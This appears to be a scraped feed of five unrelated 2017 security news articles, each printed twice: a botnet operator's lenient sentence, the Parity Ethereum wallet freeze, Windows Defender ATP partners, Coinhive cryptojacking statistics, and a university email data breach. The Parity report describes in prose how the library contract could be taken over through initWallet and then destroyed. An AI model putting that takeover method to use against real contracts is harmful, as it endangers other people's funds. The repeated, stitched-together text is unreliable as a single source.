STE WILLIAMS

A US federal court has given a break to yet another botnet operator who claims that he’s leaving cybercriminality behind.

Sean Tiernan, 29, of Santa Clara, Calif., was sentenced last week by a US District Court in Pittsburgh to two years probation but no prison time for his involvement with a spam botnet, beginning in 2011.

According to the Department of Justice, Tiernan was involved in the development of the botnet from at least 1 August 2011 until he was raided by the FBI 14 months later.

Tiernan would sell access to his botnet to those who sought to send out these commercial electronic email messages for their own personal commercial gain. At the time of the search of Tiernan’s residence and computer via a search warrant on or about 1 October 2012, over 77,000 bots, or infected computers, were active in Tiernan’s botnet.

Tiernan’s lawyers argued – obviously successfully – that their client deserved leniency for several reasons. As soon as the FBI raided his residence, he confessed and began cooperating with them. A year later, he confessed to a CAN SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act of 2003) violation.

As Bleeping Computer reported, his lawyer also argued that while the damage caused by the botnet was real, it was relatively minor – it did not steal the financial data of the victims, it did not extort them, the malware was easily removable and it only collected IP addresses, which courts no longer consider to be private data.

They noted that the spam traffic generated was just advertising, not malware-laden files. And that he didn’t make all that much profit and used it for a worthy cause – his college education. He was a student at Cal Poly when the FBI showed up at his door.

The defense also argued for leniency because Tiernan was just a kid when he got involved. They said his father was a computer consultant, he learned to code when he was a teen and was still a minor when his involvement with the botnet began.

But by 2011 he was into his 20s – a legal adult. Eligible to drink, to vote, to rent a car, to execute contracts and all other adult privileges. Which would seem to make him ineligible to claim adolescence as a defense.

However, his lawyer said he now intends to go straight – that he is enrolled in the Stanford CyberSecurity Graduate Program and is working to become a Certified Information Systems Security Professional (CISSP). He has also, “been employed continuously with a well-known company in the cybersecurity sector.” Perhaps well-known, but neither the company nor Tiernan’s job title was named.

Jody Westby, CEO of Global Cyber Risk and a cybercrime consultant, was not impressed with the sentence.

It reflects a gross lack of awareness and understanding by the judge of [cybercrime] incidents and the harm they cause. Every one of the 77,000 computers he controlled was infected with an unauthorized software program that allowed the computer to be remotely accessed and used to send spam.

That is not only a criminal violation but also a trespass to chattels and a misappropriation of the proxy computers and use of their systems and networks. This sends exactly the wrong message to cybercriminals.

Tiernan is, of course, not the first, or the most famous, cybercriminal to turn to legitimate work. Kevin Mitnick, once known as “the world’s most-wanted hacker,” and who served five years in prison for multiple computer-related crimes, is now head of Mitnick Security Consulting and chief hacking officer at KnowBe4.

Mustafa Al-Bassam, a founding and former member of LulzSec, who went by the alias tFlow, joined Secure Trading, a UK-based online payment firm, last year as a part-time security adviser while working on a degree in computer science at King’s College, London.

He was arrested in July 2011, and received a suspended 20-month prison sentence, was ordered to perform 500 hours of community service and banned from the internet for two years for his role in LulzSec.

And Hector “Sabu” Monsegur, another LulzSec founder, who then later helped take it down, was arrested by the FBI in 2011, but the arrest was kept secret and he was an informant for the agency for the next 10 months.

About a year ago, he joined Rhino Security Labs in Seattle.

Westby doesn’t oppose second chances for cybercriminals, but said it, “should not be easy.”

They are criminals. They could teach or do research but it should take a long while to prove they are reformed and a valued employee before they are allowed to get near a client’s systems. It is one thing to give a person a chance and another to simultaneously put a client at risk.

She added that if Tiernan is going to be working on client accounts, his history should be disclosed first. And she said the company should probably be in touch with its insurer, to make sure it would cover, “any wrongful actions undertaken by that person.”

Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/hkt_fDYPwKo/

A US federal court has given a break to yet another botnet operator who claims that he’s leaving cybercriminality behind.

Sean Tiernan, 29, of Santa Clara, Calif., was sentenced last week by a US District Court in Pittsburgh to two years probation but no prison time for his involvement with a spam botnet, beginning in 2011.

According to the Department of Justice, Tiernan was involved in the development of the botnet from at least 1 August 2011 until he was raided by the FBI 14 months later.

Tiernan would sell access to his botnet to those who sought to send out these commercial electronic email messages for their own personal commercial gain. At the time of the search of Tiernan’s residence and computer via a search warrant on or about 1 October 2012, over 77,000 bots, or infected computers, were active in Tiernan’s botnet.

Tiernan’s lawyers argued – obviously successfully – that their client deserved leniency for several reasons. As soon as the FBI raided his residence, he confessed and began cooperating with them. A year later, he confessed to a CAN SPAM (Controlling the Assault of Non-Solicited Pornography and Marketing Act of 2003) violation.

As Bleeping Computer reported, his lawyer also argued that while the damage caused by the botnet was real, it was relatively minor – it did not steal the financial data of the victims, it did not extort them, the malware was easily removable and it only collected IP addresses, which courts no longer consider to be private data.

They noted that the spam traffic generated was just advertising, not malware-laden files. And that he didn’t make all that much profit and used it for a worthy cause – his college education. He was a student at Cal Poly when the FBI showed up at his door.

The defense also argued for leniency because Tiernan was just a kid when he got involved. They said his father was a computer consultant, he learned to code when he was a teen and was still a minor when his involvement with the botnet began.

But by 2011 he was into his 20s – a legal adult. Eligible to drink, to vote, to rent a car, to execute contracts and all other adult privileges. Which would seem to make him ineligible to claim adolescence as a defense.

However, his lawyer said he now intends to go straight – that he is enrolled in the Stanford CyberSecurity Graduate Program and is working to become a Certified Information Systems Security Professional (CISSP). He has also, “been employed continuously with a well-known company in the cybersecurity sector.” Perhaps well-known, but neither the company nor Tiernan’s job title was named.

Jody Westby, CEO of Global Cyber Risk and a cybercrime consultant, was not impressed with the sentence.

It reflects a gross lack of awareness and understanding by the judge of [cybercrime] incidents and the harm they cause. Every one of the 77,000 computers he controlled was infected with an unauthorized software program that allowed the computer to be remotely accessed and used to send spam.

That is not only a criminal violation but also a trespass to chattels and a misappropriation of the proxy computers and use of their systems and networks. This sends exactly the wrong message to cybercriminals.

Tiernan is, of course, not the first, or the most famous, cybercriminal to turn to legitimate work. Kevin Mitnick, once known as “the world’s most-wanted hacker,” and who served five years in prison for multiple computer-related crimes, is now head of Mitnick Security Consulting and chief hacking officer at KnowBe4.

Mustafa Al-Bassam, a founding and former member of LulzSec, who went by the alias tFlow, joined Secure Trading, a UK-based online payment firm, last year as a part-time security adviser while working on a degree in computer science at King’s College, London.

He was arrested in July 2011, and received a suspended 20-month prison sentence, was ordered to perform 500 hours of community service and banned from the internet for two years for his role in LulzSec.

And Hector “Sabu” Monsegur, another LulzSec founder, who then later helped take it down, was arrested by the FBI in 2011, but the arrest was kept secret and he was an informant for the agency for the next 10 months.

About a year ago, he joined Rhino Security Labs in Seattle.

Westby doesn’t oppose second chances for cybercriminals, but said it, “should not be easy.”

They are criminals. They could teach or do research but it should take a long while to prove they are reformed and a valued employee before they are allowed to get near a client’s systems. It is one thing to give a person a chance and another to simultaneously put a client at risk.

She added that if Tiernan is going to be working on client accounts, his history should be disclosed first. And she said the company should probably be in touch with its insurer, to make sure it would cover, “any wrongful actions undertaken by that person.”

Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/hkt_fDYPwKo/

A month or so ago we wrote about the ways you can lose in the cryptocurrency game – through the volatility of its value and through vulnerable exchanges (websites that store your cryptocash) getting hacked.

Turns out there’s another way – the digital equivalent of a bank freeze, which in this case was a “wallet” freeze. As reported in multiple outlets Tuesday, something in the range of $150m to $300m of ether, the digital token of the Ethereum blockchain – second to Bitcoin as the most popular cryptocurrency – is now frozen.

The cash is holed up in cryptocurrency multi-sig wallets (wallets requiring more than one owner to “sign” a transaction before it can proceed) created after 20 July using a library provided by Parity Technologies Ltd.

Reportedly the frozen cash includes $90m belonging to Gavin Woods, Parity founder and former core developer of Ethereum.

Parity issued a Critical security alert Tuesday warning of a vulnerability in the Parity Wallet library contract. The code to create multi-sig wallets had been updated on the 20 July to fix a bug that had been exploited the previous day, a vulnerability which resulted in $32m in ether being looted from multi-sig wallets by hackers.

But, the new code contained another bug.

(I)t was possible to turn the Parity Wallet library contract into a regular multi-sig wallet and become an owner of it by calling the initWallet function.

It would seem that issue was triggered accidentally 6th Nov 2017 02:33:47 PM +UTC and subsequently a user suicided the library-turned-into-wallet, wiping out the library code which in turn rendered all multi-sig contracts unusable since their logic (any state-modifying function) was inside the library.

In layman’s terms what happened was the digital equivalent of accidentally walking off with a sack full of wallets containing millions of dollars and then throwing it in the garbage disposal by mistake.

The he or she (I’ll use “he”) who inadvertently stuffed the money into the garbage, who apparently goes by the Twitter handle @devops199, said he triggered the bug accidentally and reported it through a GitHub ticket.

Under the heading “anyone can kill your contract”, he wrote:

Hello, first of all i’m not the owner of that contract … I made myself the owner of “0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4” contract and killed it and now when i query the dependent contracts “isowner()” they all return TRUE because the delegate call made to a died contract.

I believe some one might exploit.

Later, in a series of tweets, he wrote, among other things, “Will I get arrested for this?” and “I’m eth newbie .. just learning.”

How believable is that?

Well, based on the Twitter account with that handle, he appears to be a brand-brand-new newbie to that platform. His home page says he joined in November 2017. The profile says, “Parity Account (see what I did there? Parody).”As of mid-day Wednesday, he had posted only 39 tweets and was following only 17 others, while having gained 1,411 followers since the account opened.

Of course users, newbie or otherwise, can only make mistakes if software allows them to. Matt Suiche, writing on the Comae Technologies blog, noted a number of software development issues that created the environment for this mistake to occur:

Even though the vulnerable smart-contract was open source and deployed months ago, this bug managed to escape code review done by the Parity team.

Since by design smart-contracts themselves can’t be patched easily, this make dependancies on third party libraries very lethal if a mistake happens.

The fact that libraries are global is also arguable, this would be shocking if it was how our daily use Operating Systems would work.

No matter what the cause, the important thing for users (depositors?), obviously, is whether they can get their money back. And according to most of the online discussion, a “hard fork” may be the only way to do it. A hard fork splits a single cryptocurrency in two, with both the old and new versions remaining valid. In a soft fork, only one blockchain – and therefore one coin – remains valid.

Such a move is controversial. It requires 51% of the entire Ethereum community – not just users of the wallet in question – to agree to create a new blockchain in which a hack, or in this case the freeze, never happened.

That has already been done once, in June 2016, after an Ethereum app called the DAO (Decentralized Autonomous Organization) was hacked and the attacker siphoned off an estimated $50m.

Ethereum inventor Vitalik Buterin tweeted that a hard fork shouldn’t be used in this case. He said the DAO hard fork was justified because the Ethereum ecosystem was, “less mature then (and there was) more at stake then as % of all ETH.” And:

[most impt]. Today’s attacker can just move funds, so HF is impossible.”

But Jordan Pearson, writing in Motherboard, said a Parity spokesman told him that, “At the moment we are looking into every scenario, a hard fork is one of the options.”

And Martin Holst Swende, head of security for the Ethereum Foundation, told CoinDesk that the only way to free up the funds is a hard fork.

There’s unfortunately no way to recreate the code without a hard fork. Any solution which makes the locked funds accessible requires a hard fork.

The current crisis has apparently not affected the value of the currency. While it dropped from about $305 to $290 after the news broke, at mid-afternoon on Wednesday it was back up at $312.

Meanwhile, the warning about cryptocurrency risks that Naked Security’s Paul Ducklin issued more than two years ago seems relevant for yet another reason. Such currency, “… generally speaking, (is) not covered by any of the laws relating to currency trading, brokerage, banking and so on,” he wrote.

In other words, if the company to which you entrusted your precious bitcoins suddenly tells you, “So sorry, they seem to have vanished,” then, well, that’s that: you’re out of luck.

Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/X_5K03IBg6U/

A month or so ago we wrote about the ways you can lose in the cryptocurrency game – through the volatility of its value and through vulnerable exchanges (websites that store your cryptocash) getting hacked.

Turns out there’s another way – the digital equivalent of a bank freeze, which in this case was a “wallet” freeze. As reported in multiple outlets Tuesday, something in the range of $150m to $300m of ether, the digital token of the Ethereum blockchain – second to Bitcoin as the most popular cryptocurrency – is now frozen.

The cash is holed up in cryptocurrency multi-sig wallets (wallets requiring more than one owner to “sign” a transaction before it can proceed) created after 20 July using a library provided by Parity Technologies Ltd.

Reportedly the frozen cash includes $90m belonging to Gavin Woods, Parity founder and former core developer of Ethereum.

Parity issued a Critical security alert Tuesday warning of a vulnerability in the Parity Wallet library contract. The code to create multi-sig wallets had been updated on the 20 July to fix a bug that had been exploited the previous day, a vulnerability which resulted in $32m in ether being looted from multi-sig wallets by hackers.

But, the new code contained another bug.

(I)t was possible to turn the Parity Wallet library contract into a regular multi-sig wallet and become an owner of it by calling the initWallet function.

It would seem that issue was triggered accidentally 6th Nov 2017 02:33:47 PM +UTC and subsequently a user suicided the library-turned-into-wallet, wiping out the library code which in turn rendered all multi-sig contracts unusable since their logic (any state-modifying function) was inside the library.

In layman’s terms what happened was the digital equivalent of accidentally walking off with a sack full of wallets containing millions of dollars and then throwing it in the garbage disposal by mistake.

The he or she (I’ll use “he”) who inadvertently stuffed the money into the garbage, who apparently goes by the Twitter handle @devops199, said he triggered the bug accidentally and reported it through a GitHub ticket.

Under the heading “anyone can kill your contract”, he wrote:

Hello, first of all i’m not the owner of that contract … I made myself the owner of “0x863df6bfa4469f3ead0be8f9f2aae51c91a907b4” contract and killed it and now when i query the dependent contracts “isowner()” they all return TRUE because the delegate call made to a died contract.

I believe some one might exploit.

Later, in a series of tweets, he wrote, among other things, “Will I get arrested for this?” and “I’m eth newbie .. just learning.”

How believable is that?

Well, based on the Twitter account with that handle, he appears to be a brand-brand-new newbie to that platform. His home page says he joined in November 2017. The profile says, “Parity Account (see what I did there? Parody).”As of mid-day Wednesday, he had posted only 39 tweets and was following only 17 others, while having gained 1,411 followers since the account opened.

Of course users, newbie or otherwise, can only make mistakes if software allows them to. Matt Suiche, writing on the Comae Technologies blog, noted a number of software development issues that created the environment for this mistake to occur:

Even though the vulnerable smart-contract was open source and deployed months ago, this bug managed to escape code review done by the Parity team.

Since by design smart-contracts themselves can’t be patched easily, this make dependancies on third party libraries very lethal if a mistake happens.

The fact that libraries are global is also arguable, this would be shocking if it was how our daily use Operating Systems would work.

No matter what the cause, the important thing for users (depositors?), obviously, is whether they can get their money back. And according to most of the online discussion, a “hard fork” may be the only way to do it. A hard fork splits a single cryptocurrency in two, with both the old and new versions remaining valid. In a soft fork, only one blockchain – and therefore one coin – remains valid.

Such a move is controversial. It requires 51% of the entire Ethereum community – not just users of the wallet in question – to agree to create a new blockchain in which a hack, or in this case the freeze, never happened.

That has already been done once, in June 2016, after an Ethereum app called the DAO (Decentralized Autonomous Organization) was hacked and the attacker siphoned off an estimated $50m.

Ethereum inventor Vitalik Buterin tweeted that a hard fork shouldn’t be used in this case. He said the DAO hard fork was justified because the Ethereum ecosystem was, “less mature then (and there was) more at stake then as % of all ETH.” And:

[most impt]. Today’s attacker can just move funds, so HF is impossible.”

But Jordan Pearson, writing in Motherboard, said a Parity spokesman told him that, “At the moment we are looking into every scenario, a hard fork is one of the options.”

And Martin Holst Swende, head of security for the Ethereum Foundation, told CoinDesk that the only way to free up the funds is a hard fork.

There’s unfortunately no way to recreate the code without a hard fork. Any solution which makes the locked funds accessible requires a hard fork.

The current crisis has apparently not affected the value of the currency. While it dropped from about $305 to $290 after the news broke, at mid-afternoon on Wednesday it was back up at $312.

Meanwhile, the warning about cryptocurrency risks that Naked Security’s Paul Ducklin issued more than two years ago seems relevant for yet another reason. Such currency, “… generally speaking, (is) not covered by any of the laws relating to currency trading, brokerage, banking and so on,” he wrote.

In other words, if the company to which you entrusted your precious bitcoins suddenly tells you, “So sorry, they seem to have vanished,” then, well, that’s that: you’re out of luck.

Follow @NakedSecurity

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/X_5K03IBg6U/

Windows Defender Advanced Threat Protection first landed as a public preview in September, and now it’s general availability, Redmond has announced a bunch of partners to give it cross-platform support: Bitdefender for Linux and macOS, Lookout for iOS and Android, and Ziften for macOS and Linux).

With Bitdefender’s Gravityzone Cloud integration arriving in public preview today, El Reg spoke to the company’s group product manager Deepakeswaran Kolingivadi – DK – to find out what Redmond wanted.

DK told us the demand came from Microsoft’s enterprise customers, who having seen Microsoft’s code wanted the system to cover non-Windows devices.

“When MS pitched their Windows Defender Advanced Threat Protection (ATP) solution to their customers, they liked seeing Windows-based malware detection … they expressed the need to see that information in the same console from Mac/Linux,” DK told The Register.

In particular, he said, macOS machines were nominated as popular in the executive suites, and Microsoft didn’t have coverage of them. That’s made them an attractive target, and “in the last couple of years we’ve seen a spike in attacks”.

That contact, “around four or five months ago”, set off the integration effort, and DK said the two companies’ engineers got the work completed within a quarter.

Bitdefender info through Windows Defender ATP. Click to embiggen

He said the current capabilities will be expanded, with Bitdefender increasingly seeing “platform-agnostic script-based attacks” that can affect Windows and macOS alike, and defences against those threats are part of the company’s plans.

Announcing the partners, Microsoft said Lookout and Ziften products for Windows Defender ATP will land soon. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/windows_defender_atp_partners/

Windows Defender Advanced Threat Protection first landed as a public preview in September, and now it’s general availability, Redmond has announced a bunch of partners to give it cross-platform support: Bitdefender for Linux and macOS, Lookout for iOS and Android, and Ziften for macOS and Linux).

With Bitdefender’s Gravityzone Cloud integration arriving in public preview today, El Reg spoke to the company’s group product manager Deepakeswaran Kolingivadi – DK – to find out what Redmond wanted.

DK told us the demand came from Microsoft’s enterprise customers, who having seen Microsoft’s code wanted the system to cover non-Windows devices.

“When MS pitched their Windows Defender Advanced Threat Protection (ATP) solution to their customers, they liked seeing Windows-based malware detection … they expressed the need to see that information in the same console from Mac/Linux,” DK told The Register.

In particular, he said, macOS machines were nominated as popular in the executive suites, and Microsoft didn’t have coverage of them. That’s made them an attractive target, and “in the last couple of years we’ve seen a spike in attacks”.

That contact, “around four or five months ago”, set off the integration effort, and DK said the two companies’ engineers got the work completed within a quarter.

Bitdefender info through Windows Defender ATP. Click to embiggen

He said the current capabilities will be expanded, with Bitdefender increasingly seeing “platform-agnostic script-based attacks” that can affect Windows and macOS alike, and defences against those threats are part of the company’s plans.

Announcing the partners, Microsoft said Lookout and Ziften products for Windows Defender ATP will land soon. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/windows_defender_atp_partners/

A total of 2,531 of the top 3 million websites (1 in 1,000) are running the Coinhive miner, according to new stats from analytics firm Red Volcano.

BitTorrent sites and the like were the main offenders but the batch also included the Ecuadorian Papa John’s Pizza website [see source code].

JavaScript-based Coinhive crypto-mining software on websites is bad news for surfers because the technology can suck up power and resources without user consent.

Coinhive launched a service in September that allowed mining of a digital currency called Monero directly within a web browser. The simplicity of the Coinhive API integration made the approach successful but partly due to several initial oversights – most notably through a failure to enforce an opt-in process to establish user consent – the technology has been widely abused.

Drive-by mining is the new drive-by downloading [source: Malwarebytes white paper]

Some less than salubrious web portals started to run the Coinhive API in non-throttled mode, tying up users’ machines in the process. In other cases hackers planted code crypto-mining software on third-party websites, a practice known as either crypto-jacking or drive-by mining.

US and Spain top the list of countries most impacted by drive-by mining [source: Malwarebytes]

Instances of crypto-mining code on webpages or buried within rogue smartphone apps keep rolling in.

Security vendor Ixia warns two games on the Google Play store, Puzzle and Reward Digger, by AK Games are actively mining cryptocurrency from thousands of infected Android mobile phones.

Android cryptocurrency mining malware can be quite lucrative for cybercriminals. For instance, total profits earned on one specific Magicoin wallet are equal to $1,150 at current exchange rates, according to Ixia’s report. This makes cryptominers the next generation of adware software, Ixia concluded.

Elsewhere Netskope discovered a Coinhive miner installed as a plugin on a tutorial webpage for Microsoft Office 365 OneDrive for Business. The offending website – https://www.sky-future[.]net – removed the Coinhive plugin after it was notified about the issue. “The tutorial webpage hosted on the website was saved to the cloud and then shared within an organisation,” according to Netskope.

Microsoft told El Reg that its “security software detects and blocks this application”. Ad blockers and antivirus programs have also added features that block browser mining but few security watchers think this alone will bring the issue to heel. The opportunity to coin in cryptocurrency by enslaving the machines of others is just too tempting for unscrupulous websites and black hats. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/crypto_mining_sitrep/

A total of 2,531 of the top 3 million websites (1 in 1,000) are running the Coinhive miner, according to new stats from analytics firm Red Volcano.

BitTorrent sites and the like were the main offenders but the batch also included the Ecuadorian Papa John’s Pizza website [see source code].

JavaScript-based Coinhive crypto-mining software on websites is bad news for surfers because the technology can suck up power and resources without user consent.

Coinhive launched a service in September that allowed mining of a digital currency called Monero directly within a web browser. The simplicity of the Coinhive API integration made the approach successful but partly due to several initial oversights – most notably through a failure to enforce an opt-in process to establish user consent – the technology has been widely abused.

Drive-by mining is the new drive-by downloading [source: Malwarebytes white paper]

Some less than salubrious web portals started to run the Coinhive API in non-throttled mode, tying up users’ machines in the process. In other cases hackers planted code crypto-mining software on third-party websites, a practice known as either crypto-jacking or drive-by mining.

US and Spain top the list of countries most impacted by drive-by mining [source: Malwarebytes]

Instances of crypto-mining code on webpages or buried within rogue smartphone apps keep rolling in.

Security vendor Ixia warns two games on the Google Play store, Puzzle and Reward Digger, by AK Games are actively mining cryptocurrency from thousands of infected Android mobile phones.

Android cryptocurrency mining malware can be quite lucrative for cybercriminals. For instance, total profits earned on one specific Magicoin wallet are equal to $1,150 at current exchange rates, according to Ixia’s report. This makes cryptominers the next generation of adware software, Ixia concluded.

Elsewhere Netskope discovered a Coinhive miner installed as a plugin on a tutorial webpage for Microsoft Office 365 OneDrive for Business. The offending website – https://www.sky-future[.]net – removed the Coinhive plugin after it was notified about the issue. “The tutorial webpage hosted on the website was saved to the cloud and then shared within an organisation,” according to Netskope.

Microsoft told El Reg that its “security software detects and blocks this application”. Ad blockers and antivirus programs have also added features that block browser mining but few security watchers think this alone will bring the issue to heel. The opportunity to coin in cryptocurrency by enslaving the machines of others is just too tempting for unscrupulous websites and black hats. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/crypto_mining_sitrep/

For the second time in five months, The University of East Anglia has been involved in a personal data breach.

Around 300 postgraduate students in the received an email on Sunday 5 November which contained “personal information about the health of a member of staff”, due to the accidental use of an email distribution list.

UEA’s IT department responded by remotely extracting the email from the accounts to which it had been sent. The Social Sciences Faculty then contacted the students explaining what had happened; requesting that those who had been sent the mistaken email respect the privacy of the individual involved, and deleted any additional copies that may have been created by auto-forwarding.

In a statement given to the Norwich Evening News, UEA said: “This was unintentional and clearly should not have happened, and the university apologises unreservedly.

“An urgent investigation into how this happened is under way. The university contacted the member of staff to apologise and will be providing support.

“The University will continue with the roll out of our newly created action plan to prevent incidents like this in the future.”

The previous data breach took place in June this year, when details of 191 students’ extenuating circumstances were sent to 298 American Studies undergraduates.

The ICO investigated after UEA referred itself to it, but the university was ruled to have not met the requirements for the commissioner to take action.

We’ve contacted the university and the ICO for comment.

Notification of personal data breaches will become mandatory when the General Data Protection Regulation comes into force from 25 May 2018. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/university_leaks_personal_data_for_second_time_in_five_months/

For the second time in five months, The University of East Anglia has been involved in a personal data breach.

Around 300 postgraduate students in the received an email on Sunday 5 November which contained “personal information about the health of a member of staff”, due to the accidental use of an email distribution list.

UEA’s IT department responded by remotely extracting the email from the accounts to which it had been sent. The Social Sciences Faculty then contacted the students explaining what had happened; requesting that those who had been sent the mistaken email respect the privacy of the individual involved, and deleted any additional copies that may have been created by auto-forwarding.

In a statement given to the Norwich Evening News, UEA said: “This was unintentional and clearly should not have happened, and the university apologises unreservedly.

“An urgent investigation into how this happened is under way. The university contacted the member of staff to apologise and will be providing support.

“The University will continue with the roll out of our newly created action plan to prevent incidents like this in the future.”

The previous data breach took place in June this year, when details of 191 students’ extenuating circumstances were sent to 298 American Studies undergraduates.

The ICO investigated after UEA referred itself to it, but the university was ruled to have not met the requirements for the commissioner to take action.

We’ve contacted the university and the ICO for comment.

Notification of personal data breaches will become mandatory when the General Data Protection Regulation comes into force from 25 May 2018. ®

Sponsored:
The Joy and Pain of Buying IT – Have Your Say

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/university_leaks_personal_data_for_second_time_in_five_months/